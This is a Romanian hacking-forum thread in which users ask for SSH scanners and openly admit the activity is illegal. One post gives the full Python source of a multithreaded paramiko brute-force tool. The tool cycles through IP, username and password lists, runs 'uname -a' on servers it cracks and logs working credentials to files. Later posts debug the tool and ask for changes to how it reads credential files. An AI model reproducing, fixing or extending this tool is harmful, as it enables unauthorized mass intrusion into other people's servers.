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  1. Vai de mortii tai de terminat
  2. Salut, imi poate da si mie un scanner ssh nou/vechi? de preferat in python. Sa nu aiba user.txt - pass.txt sa fie amundoua intr-un fisier. (fara haiduc,jihad,haita ) le am deja. is curios ce mai are lumea ( stiu ca este ilegal, sper sa nu imi repetati asta)
  3. am eu
  4. cineva?
  5. modifica tu geniule, toti cu gandirea aia de roman batut in cap, repede sa injurati sau sa jigniti, dmn ce specimene
  6. un link ceva? era un site dar nu mai stiu numele
  7. trebuie card, deci daca dai 1 click nasol se duc $$ de pe card =]]
  8. am rezolvat problema de mai sus, erau pusi ? la sfarsit la 2 linii, acum am alta problema mai exact eroarea asta cate thread-uri pun de atatea ori o da. root@mail:/home/administrator# python t.py 500 ips pass Exception in thread Thread-26: Traceback (most recent call last): File "/usr/lib/python2.7/threading.py", line 810, in __bootstrap_inner self.run() File "t.py", line 15, in run self.kraken(ip, user, passwd) File "t.py", line 24, in kraken dbg = str(sys.argv[4]) IndexError: list index out of range si asta No handlers could be found for logger "paramiko.transport"
  9. File "t.py", line 16 self.queue.task_done()? ^ SyntaxError: invalid syntax
  10. Salut rst, am vazut o sursa de ssh bruteforce in python mai exact a lui @Elohim sursa ia usererele dintr-un fisier diferit si parolele din alt fisier is curios daca poate cineva sa o modifice sa ia din acelasi fisier mai exact ex: pass.txt in fisier sa fie " user:pass " sau "user pass " aveti sursa mai jos, thx import paramiko, sys, Queue, threading class SSHBrute(threading.Thread): def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): while True: ip,user,passwd = self.queue.get() self.kraken(ip,user,passwd) self.queue.task_done() def kraken(self,ip,user,passwd): try: if ip in cracked: return False if '%user%' in str(passwd): passwd = passwd.split("%")[0] + user + passwd.split("%")[2] if '%User%' in str(passwd): pwd = user + passwd.split("%")[2] passwd = passwd.split("%")[0]+pwd.title() if str(passwd) == '%null%': passwd = '' ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) ssh.connect(ip, username=user, password=passwd, timeout=35) raw.write(ip+' '+user+' '+passwd+'\n') raw.flush() chan = ssh.get_transport().open_session() chan.settimeout(35) chan.exec_command('uname -a') data = chan.recv(1024) if len(data) == 0: nologs.write(ip+' '+user+' '+passwd+'\n') nologs.flush() return False val.write(ip+' '+user+' '+passwd+'|'+data.rstrip()+'\n') val.flush() cracked.append(ip) chan.close() ssh.close() return True except Exception, e: if 'uthent' in str(e): if dbg == 'bad': bad.write(ip+'\n') bad.flush() #print '\r[+]Tried '+ip+' '+user+' '+passwd+' ' ssh.close() return False #print ip, str(e) ssh.close() return False def brutemain(): if len(sys.argv) < 2: print """ SSH Brute Force Tool Author: @Elohim [RST] Usage: bruter ThreadNumber IpFile UserFile PassFile FilterSwitch* *The filter Switch Takes Either the word "bad" or "no". If you supply the word bad, it filters in bad.txt only the ips which indeed support ssh AUTH and password didn't work""" return False ThreadNR = int(sys.argv[1]) queue = Queue.Queue(maxsize=20000) try: i = 0 for i in range(ThreadNR): t = SSHBrute(queue) t.daemon = True t.start() i += 1 except Exception, e: print 'Cant start more than',i,'Threads!' global bad global val global nologs global cracked global raw cracked = [] bad = open('bad.txt','w') val = open('valid.txt','a') nologs = open('nologins.txt','a') raw = open('raw.txt','a') with open(str(sys.argv[2]),'rU') as ipf: ips = ipf.read().splitlines() with open(str(sys.argv[3]),'rU') as uf: users = uf.read().splitlines() with open(str(sys.argv[4]),'rU') as pf: passwords = pf.read().splitlines() global dbg dbg = str(sys.argv[5]) try: for password in passwords: for user in users: for ip in ips: queue.put((ip,user,password)) except: pass queue.join() if __name__ == "__main__": brutemain()
  11. Ma poate ajuta cineva sa ia sursa dintr-un fisier userele si parolele de exemplu pass_file.txt si ele puse User:parola sau "user parola"
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